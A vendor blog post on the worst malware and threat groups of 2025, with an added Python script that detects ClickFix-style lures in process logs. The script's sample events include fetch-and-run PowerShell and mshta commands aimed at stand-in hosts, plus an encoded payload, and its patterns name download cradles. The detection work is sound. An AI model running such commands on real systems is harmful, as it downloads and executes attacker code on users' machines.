
Beware the nastiest malware of 2025

Blog: OpenText Blogs

October is Cybersecurity Awareness Month, an ideal moment to take stock of the evolving digital threats shaping our world. OpenText™ Cybersecurity’s annual Nastiest Malware list reveals a sobering truth: today’s cyberattacks aren’t just smarter, they’re more personal.

Armed with artificial intelligence and stolen identities, cybercriminals are moving faster than ever, blurring the line between human trust and machine deception. The result? A new era of attacks where deepfakes, identity theft, and AI-powered social engineering redefine what it means to stay secure.

The message is clear: today’s attackers aren’t just targeting systems, they’re targeting people.

From hunting vulnerabilities to hunting people

Attackers have stopped hunting for vulnerabilities and started hunting for people. They steal identities, forge voices, and deploy AI to outsmart defenses in seconds. In a world where trust can be mimicked in milliseconds, identity must become a person’s strongest signal of control.

This shift marks the rise of identity-first threats where deepfakes, AI-generated messages, and credential theft are now front-line weapons.

The nastiest malware of 2025

  1. Qilin: This ransomware-as-a-service powerhouse tops the 2025 list after a relentless wave of attacks on hospitals, laboratories, and local governments worldwide. It carried out more than 200 confirmed incidents, averaging one new healthcare breach every week. Its “Call Lawyer” negotiation feature and ties to state-backed actors like North Korea’s Moonstone Sleet highlight how ransomware has evolved into a professionalized, geopolitical enterprise.
  2. Akira: Now operating like a disciplined enterprise, Akira shifted focus to high-value targets and managed service providers while avoiding critical infrastructure. A midyear SonicWall VPN campaign compromised dozens of organizations within days, proving the group’s efficiency and staying power.
  3. Scattered Spider (UNC3944): One of 2025’s most notorious threat groups, Scattered Spider weaponized deepfake voice calls, SIM swaps, and help-desk impersonation to win instant access to corporate networks. September’s international arrests exposed core members, but splinter crews and copycats continue to reuse the group’s playbook of manipulation and identity fraud.
  4. Play Ransomware: Play quietly became one of the year’s most destructive threats, with the FBI confirming more than 900 victim organizations. By hijacking managed service providers and remote-management tools, it turned single compromises into cascading supply-chain breaches that disrupted hundreds of businesses at once.
  5. ShinyHunters: Known for long-term infiltration and patience, ShinyHunters breached major enterprises including Google, Salesforce, and luxury brand Kering, parent company of Gucci and Balenciaga, before auctioning stolen data online. The group times leaks to coincide with regulatory disclosures, turning compliance pressure and brand damage into powerful extortion weapons.
  6. Lumma Stealer: A core enabler of 2025’s ransomware ecosystem, Lumma supplied credentials and access for major groups like Qilin and Akira through large-scale data theft. After a Microsoft takedown midyear, it reappeared within days using fake installers and “ClickFix” phishing pages to trick users into running malicious commands and surrendering sensitive information.

Together, these groups show how identity abuse and AI innovation have merged, turning traditional hacking into a full-fledged ransomware economy.

Staying one step ahead

Defending against this new breed of cyber threat requires more than traditional antivirus or perimeter security. OpenText Cybersecurity recommends:

  • Protect identity first using phishing-resistant multifactor authentication and zero-trust architecture.
  • Patch vulnerabilities and monitor for info-stealers.
  • Secure remote tools and regularly test backups.
  • Train employees to spot deepfakes and social engineering attempts.
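The “monitor for info-stealers” advice above, and the ClickFix lure described under Lumma Stealer (a page that talks the user into pasting a command into a Run dialog or terminal), can be turned into a concrete endpoint check. The following is an added example, not code from OpenText or from the report it summarizes: a small triage routine that scans process-creation records for the tell-tale shape of such a lure, a script interpreter spawned by the user’s own shell (explorer.exe) with a command line that hides its window, carries an encoded payload, or downloads and evaluates something from the internet. The event field names, the indicator list and the sample events are this example’s own constructions, not a vendor schema or real telemetry.

```python
"""Added example (not from the original post): flag process-creation events whose
shape matches a user pasting a ClickFix-style command. Field names, indicator
patterns and sample events are constructed for illustration."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Interpreters such lures typically ask the victim to launch, and the shell process
# that is the parent of anything started from the Run dialog, Start menu or File Explorer.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
USER_SHELLS = {"explorer.exe"}

# Command-line traits worth a second look when a human, not a scheduled task or an
# admin tool, launched the interpreter. Each is weak alone; together they spell
# "fetch something remote and run it without showing a window".
INDICATORS = [
    ("encoded_command", re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}")),
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("download_cradle", re.compile(r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget|downloadstring)\b")),
    ("inline_eval", re.compile(r"(?i)\b(?:iex|invoke-expression)\b")),
    ("remote_url", re.compile(r"(?i)https?://")),
]


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record; field names are this example's own."""
    parent_image: str
    image: str
    command_line: str
    user: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def indicators_for(event: ProcessEvent) -> list[str]:
    """Names of matching indicators when the event has the 'interpreter launched by
    the user's shell' shape; an empty list otherwise (wrong parent or image)."""
    if _basename(event.parent_image) not in USER_SHELLS:
        return []
    if _basename(event.image) not in INTERPRETERS:
        return []
    return [name for name, rx in INDICATORS if rx.search(event.command_line)]


def triage(events: list[ProcessEvent]) -> list[dict]:
    """Return one finding per event with at least one indicator, highest score first."""
    findings = []
    for idx, ev in enumerate(events):
        hits = indicators_for(ev)
        if hits:
            findings.append({"index": idx, "user": ev.user, "score": len(hits),
                             "indicators": hits, "command_line": ev.command_line})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


# Constructed sample telemetry: two lure-like launches, two benign ones, one encoded payload.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -c \"iex (iwr 'http://example.invalid/fix.ps1')\"", r"CORP\jdoe"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta http://example.invalid/verify", r"CORP\asmith"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd /c dir", r"CORP\jdoe"),
    ProcessEvent(r"C:\Program Files\VSCode\Code.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -c Get-Process", r"CORP\dev1"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=", r"CORP\bwong"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[score {f['score']}] {f['user']}: {f['command_line']}  <- {', '.join(f['indicators'])}")
```

The parent-process condition does most of the work: administrators and automation rarely start PowerShell from explorer.exe with a hidden window and a download cradle, while a victim following on-screen “fix” instructions almost always does. Findings with a score of 1 (a lone URL or encoded blob) are worth a look but not an automatic alert; the higher-scoring combination is the one to page on and to pair with a credential reset, since the post notes these lures feed info-stealers that hand credentials to ransomware crews.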

Cyber resilience today means understanding that every person, every login, every device can be both a target and a line of defense.

Join the movement this Cybersecurity Awareness Month

Cybersecurity isn’t just a corporate responsibility—it’s a personal one. Whether you’re managing sensitive business data or protecting your own digital footprint, awareness is your best defense.

Visit OpenText’s Cybersecurity Awareness webpage to explore interactive activities, test your cyber smarts, and learn practical ways to stay secure—at work and at home.

Read a more in-depth report on OpenText’s list of 2025 Nastiest Malware from OpenText Senior Security Analyst Tyler Moffitt here.
